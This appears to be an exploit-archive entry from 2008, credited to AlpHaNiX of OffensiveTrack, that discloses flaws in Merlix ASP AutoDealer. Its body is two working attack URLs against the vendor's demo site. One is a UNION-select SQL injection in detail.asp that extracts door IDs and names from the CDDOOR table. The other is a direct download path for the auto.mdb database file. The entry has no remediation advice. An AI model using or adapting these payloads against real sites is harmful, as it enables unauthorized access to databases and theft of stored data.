id: 4363
date: 12/05/2008
title: ASP AutoDealer (SQL/DD) Multiple Remote Vulnerabilities
author: AlpHaNiX
cves: 

=======================================================
ASP AutoDealer (SQL/DD) Multiple Remote Vulnerabilities
=======================================================


###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


----------------------------------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX

###########################################################################

#script   : Merlix ASP AutoDealer
#download : null
#Demo     : http://demo.merlix.com/autodealer/



#Exploits :

--=[SQL INJECTION]=--
http://demo.merlix.com/autodealer/detail.asp?ID=-0+union+select+1,null,null,0,null,CDDoorID,null,null,null,null,CDDoorName,null,null,null,null,null,17+from+CDDOOR



--=[DATABASE DISCLOSURE]=--
http://demo.merlix.com/autodealer/auto.mdb


###########################################################################


#  0day.today [2023-03-26]  #